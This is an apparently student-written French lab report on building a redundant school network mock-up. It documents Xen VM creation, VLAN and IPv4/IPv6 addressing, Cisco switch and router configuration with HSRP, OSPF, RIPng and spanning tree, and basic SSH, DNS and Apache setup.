&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
&lt;br /&gt;
== Installation dans la machine virtuelle Xen ==&lt;br /&gt;
Nous avons acheté notre domaine : mycoplasma.site sur le site gandi. Il faut créer la machine virtuelle Xen Linux sur le ''dom0 cordouan.insecserv.deule.net''&lt;br /&gt;
&lt;br /&gt;
Donc il faut se connecter en shh à Cordouan: &lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
Puis créer notre machine virtuelle : &lt;br /&gt;
 xen-create-image --hostname=mycoplasma --dhcp --dir=/usr/local/xen --dist=buster&lt;br /&gt;
 xl create mycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
On a ensuite installer les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind :&lt;br /&gt;
 sudo apt-get install openssh-server&lt;br /&gt;
 sudo apt-get install apache2&lt;br /&gt;
 sudo apt-get install -y bind9&lt;br /&gt;
&lt;br /&gt;
Pour afficher les logs et savoir si l'installation à bien lieu : &lt;br /&gt;
   tail -f /var/log/xen-tools/mycoplasma.log&lt;br /&gt;
=== Accès Internet et Permettre SSH ===&lt;br /&gt;
Une fois la VM créée (semaine 1), il faut installer les packages, donc il faut lui donner l'accès à internet. Il faut modifier le fichier suivant etc/network/interfaces. Pour enregistrer les modifications, il faut exécuter les commandes: if down eth0, ifup eth0.&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour le moment, pour se connecter à la Machine virtuelle, on utilise la commande suivante: &lt;br /&gt;
 xl console mycoplasma&lt;br /&gt;
&lt;br /&gt;
====SSH====&lt;br /&gt;
Mais il y a une seconde façon d'accéder à notre VM: c'est en utilisant SSH. Pour le faire il faut remplacer la ligne suivante :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot; &lt;br /&gt;
par &lt;br /&gt;
 &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
de ce fichier etc/ssh/sshd_config.&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== L’architecture générale ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-generale.png|right|180 px|thumb]]&lt;br /&gt;
L'objectif que l'on souhaite réaliser dans cette partie est une architecture capable de résister à la défaillance de quelques uns des équipements réseau qui la composent par le biais de la redondance.&lt;br /&gt;
&lt;br /&gt;
Nous disposons, pour la réalisation, de deux commutateurs et de deux routeurs et deux bornes wifi répartis entre les deux salles E304 et E306. &lt;br /&gt;
&lt;br /&gt;
Nous avons sur les deux terminaisons de notre architecture:&lt;br /&gt;
&lt;br /&gt;
* Le serveur XEN qui abrite des machines virtuelles avec les différents services qui y sont implantés.&lt;br /&gt;
* Le réseau de l'école.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
Le schéma de principe ci-joint, résume l'architecture proposée.&lt;br /&gt;
&lt;br /&gt;
On peut ainsi voir à partir de ce schéma que tant que nous avons au minimum un routeur et un commutateur fonctionnels l’infrastructure pourra toujours assurer le service&lt;br /&gt;
&lt;br /&gt;
Entre autres, on doit satisfaire le cahier des charges suivant:&lt;br /&gt;
* Un routage IPv4&lt;br /&gt;
* Un routage IPv6&lt;br /&gt;
* Interconnexion avec Internet (IPv4)&lt;br /&gt;
* Interconnexion avec Internet (IPv6)&lt;br /&gt;
* Sécurisation du réseau en implantant le protocol VRRP sur les routeurs.&lt;br /&gt;
* Confguration des bornes wifi&lt;br /&gt;
&lt;br /&gt;
===Organisation du travail ===&lt;br /&gt;
[[Fichier:mejbar-aitmouheb-infra-E304.png|right|180 px|thumb]]&lt;br /&gt;
Nous avons pris l'initiative de nous répartir la réalisation de l'infrastructure et notre groupe s'est principalement chargé de l'implémentation sur la partie E304.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sur cette partie nous devons donc configurer le commutateur (COM-1) pour:&lt;br /&gt;
* Communiquer avec la serveur XEN&lt;br /&gt;
* Communiquer avec le routeur R1 en E304 et le R2 en E306.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Et configurer le routeur R1 pour:&lt;br /&gt;
* L'interconnexion des deux commutateurs COM-1 et COM-2 avec le réseau de l'école et internet &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Le schéma proposé à droite résume le choix des interfaces pour la réalisation de l'interconnexion des équipements.&lt;br /&gt;
&lt;br /&gt;
===Réalisation===&lt;br /&gt;
Rappelons la table des adressages convenue en phase d'architecture:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! VLAN !! Réseau IPV4 !! Réseau IPV6 !! IP routeur 1 !! IP routeur 2 !! Routeur virtuel !! Nom VM !! IP VM !! IP VM Private&lt;br /&gt;
|-&lt;br /&gt;
| XEN&lt;br /&gt;
| 200&lt;br /&gt;
| 193.48.57.176/28 &lt;br /&gt;
| 2001:660:4401:60AB::/64 &lt;br /&gt;
| 193.48.57.188/28&lt;br /&gt;
| 193.48.57.189/28&lt;br /&gt;
| 193.48.57.190/28&lt;br /&gt;
| ***&lt;br /&gt;
| 193.48.57.176/28&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Interconnection&lt;br /&gt;
| 131&lt;br /&gt;
| 10.60.100.0/24&lt;br /&gt;
| ***&lt;br /&gt;
| 10.60.100.1/24&lt;br /&gt;
| 10.60.100.2/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| 101 &lt;br /&gt;
| 10.60.101.0/24&lt;br /&gt;
| 2001:660:4401:60A1::/64 &lt;br /&gt;
| 10.60.101.1/24&lt;br /&gt;
| 10.60.101.2/24&lt;br /&gt;
| 10.60.101.3/24&lt;br /&gt;
| 6phil&lt;br /&gt;
| 193.48.57.177/28&lt;br /&gt;
| 192.168.0.1&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2&lt;br /&gt;
| 102&lt;br /&gt;
| 10.60.102.0/24&lt;br /&gt;
| 2001:660:4401:60A2::/64 &lt;br /&gt;
| 10.60.102.1/24&lt;br /&gt;
| 10.60.102.2/24&lt;br /&gt;
| 10.60.102.3/24&lt;br /&gt;
| mycoplasma&lt;br /&gt;
| 193.48.57.178/28&lt;br /&gt;
| 192.168.0.2&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3&lt;br /&gt;
| 103 &lt;br /&gt;
| 10.60.103.0/24&lt;br /&gt;
| 2001:660:4401:60A3::/64&lt;br /&gt;
| 10.60.103.1/24&lt;br /&gt;
| 10.60.103.2/24&lt;br /&gt;
| 10.60.103.3/24&lt;br /&gt;
| herpesgenital&lt;br /&gt;
| 193.48.57.179/28&lt;br /&gt;
| 192.168.0.3&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4&lt;br /&gt;
| 104 &lt;br /&gt;
| 10.60.104.0/24&lt;br /&gt;
| 2001:660:4401:60A4::/64 &lt;br /&gt;
| 10.60.104.1/24&lt;br /&gt;
| 10.60.104.2/24&lt;br /&gt;
| 10.60.104.3/24&lt;br /&gt;
| chlamydiae&lt;br /&gt;
| 193.48.57.180/28&lt;br /&gt;
| 192.168.0.4&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5&lt;br /&gt;
| 105 &lt;br /&gt;
| 10.60.105.0/24&lt;br /&gt;
| 2001:660:4401:60A5::/64 &lt;br /&gt;
| 10.60.105.1/24&lt;br /&gt;
| 10.60.105.2/24&lt;br /&gt;
| 10.60.105.3/24&lt;br /&gt;
| chaudepisse&lt;br /&gt;
| 193.48.57.181/28&lt;br /&gt;
| 192.168.0.5&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6&lt;br /&gt;
| 106 &lt;br /&gt;
| 10.60.106.0/24&lt;br /&gt;
| 2001:660:4401:60A6::/64 &lt;br /&gt;
| 10.60.106.1/24&lt;br /&gt;
| 10.60.106.2/24&lt;br /&gt;
| 10.60.106.3/24&lt;br /&gt;
| blennoragie&lt;br /&gt;
| 193.48.57.182/28&lt;br /&gt;
| 192.168.0.6&lt;br /&gt;
|-&lt;br /&gt;
| Autres&lt;br /&gt;
| 300&lt;br /&gt;
| 10.60.200.0/24&lt;br /&gt;
| 2001:660:4401:60AA::/64 &lt;br /&gt;
| 10.60.200.1/24&lt;br /&gt;
| 10.60.200.2/24&lt;br /&gt;
| 10.60.200.3/24&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
| ***&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir, les VMs exposées possèdent chacune deux adresses IPv4 sur deux réseaux différents:&lt;br /&gt;
#Le réseau routé     :  193.48.57.176/28      (Class C)&lt;br /&gt;
#Le réseau non-routé :  10.10.0.0/16          (Class A)&lt;br /&gt;
&lt;br /&gt;
Nous devons allouer sur le réseau non-routé, dit privé, un VLAN pour chaque groupe pour qu'il puisse y connecter son client Wifi en plus des VLANs fonctionnels.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du commutateur 1 (COM-1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des VLANs=====&lt;br /&gt;
Pour la création des VLANs nous utilisons la suite de commandes ci-dessous:&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  vlan &amp;lt;NUMERO&amp;gt;&lt;br /&gt;
   name &amp;lt;NOM&amp;gt;&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
avec les couples de valeurs:&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! &amp;lt;NUMERO&amp;gt; !! &amp;lt;NOM&amp;gt; &lt;br /&gt;
|-&lt;br /&gt;
| 101&lt;br /&gt;
| VLAN0101&lt;br /&gt;
|-&lt;br /&gt;
| 102&lt;br /&gt;
| VLAN0102 &lt;br /&gt;
|-&lt;br /&gt;
| 103&lt;br /&gt;
| VLAN0103&lt;br /&gt;
|-&lt;br /&gt;
| 104&lt;br /&gt;
| VLAN0104&lt;br /&gt;
|-&lt;br /&gt;
| 105&lt;br /&gt;
| VLAN0105&lt;br /&gt;
|-&lt;br /&gt;
| 106&lt;br /&gt;
| VLAN0106&lt;br /&gt;
|-&lt;br /&gt;
| 131&lt;br /&gt;
| INTERCNX&lt;br /&gt;
|-&lt;br /&gt;
| 200&lt;br /&gt;
| XEN&lt;br /&gt;
|-&lt;br /&gt;
| 300&lt;br /&gt;
| MANAGEMENT&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Donner au commutateur 1 une IP dans le Vlan de management : &lt;br /&gt;
&lt;br /&gt;
 conf t &lt;br /&gt;
  interface Vlan300&lt;br /&gt;
  ip address 10.60.200.254 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
En première approche, nous avons souhaité activer une connexion sécurisée (SSH) de management en créant des clés RSA et une configuration VTY mais le commutateur n'a pas l'air, à première vue, d'implémenter cette fonctionnalité  nous laissant qu'avec du Telnet (en Clair) que nous avons donc décidé de ne pas configurer.&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers XEN=====&lt;br /&gt;
Cette connexion doit faire transiter les différents VLANs et doit donc être en Trunk.&lt;br /&gt;
&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet1/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport trunk encapsulation dot1q         # On utilise le standard 802.1q pour l'encapsulation&lt;br /&gt;
   switchport mode trunk                        # On met l'interface en mode Trunk&lt;br /&gt;
   no shut&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R1=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/1&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers R2=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
 interface GigabitEthernet1/2&lt;br /&gt;
  switchport&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
=====Liaison COM-1 vers Borne Wifi=====&lt;br /&gt;
'''Configuration de l'interface'''&lt;br /&gt;
 conf t&lt;br /&gt;
  interface GigabitEthernet4/4&lt;br /&gt;
   switchport&lt;br /&gt;
   switchport mode trunk&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Configuration du Routeur 1 (R1)====&lt;br /&gt;
&lt;br /&gt;
=====Création des Réseaux virtuels=====&lt;br /&gt;
La notion de Bridge Domain Interface (BDI)&lt;br /&gt;
&lt;br /&gt;
HSRP: Hot standby router protocol [https://en.wikipedia.org/wiki/Hot_Standby_Router_Protocol plus]&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  interface BDI101&lt;br /&gt;
   ip address 10.60.101.1 255.255.255.0                # adresse IPv4 locale&lt;br /&gt;
   standby version 2                                   # utilisation du protocol HSRP version 2 pour la haute disponibilité dans le cas où un routeur tombe en panne&lt;br /&gt;
   standby 101 ip 10.60.101.3                          # on définit un standby group pour cette interface avec l'adresse du routeur virtuel&lt;br /&gt;
   standby 101 preempt                                 # fait en sorte que le routeur actif avec la plus grande priorité prenne en charge le routage par préemption sur ce groupe &lt;br /&gt;
   ipv6 address 2001:660:4401:60A1::/64 eui-64         # configuration des adresses IPv6&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  interface BDI102&lt;br /&gt;
   ip address 10.60.102.1 255.255.255.0&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 102 ip 10.60.102.3&lt;br /&gt;
   standby 102 preempt&lt;br /&gt;
   ipv6 address 2001:660:4401:60A2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60A2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   no shut &lt;br /&gt;
   exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI103&lt;br /&gt;
  ip address 10.60.103.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 103 ip 10.60.103.3&lt;br /&gt;
  standby 103 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
Et pour le management&lt;br /&gt;
  interface BDI300&lt;br /&gt;
   ip address 10.60.200.1 255.255.255.0&lt;br /&gt;
   no shut&lt;br /&gt;
   exit&lt;br /&gt;
  exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
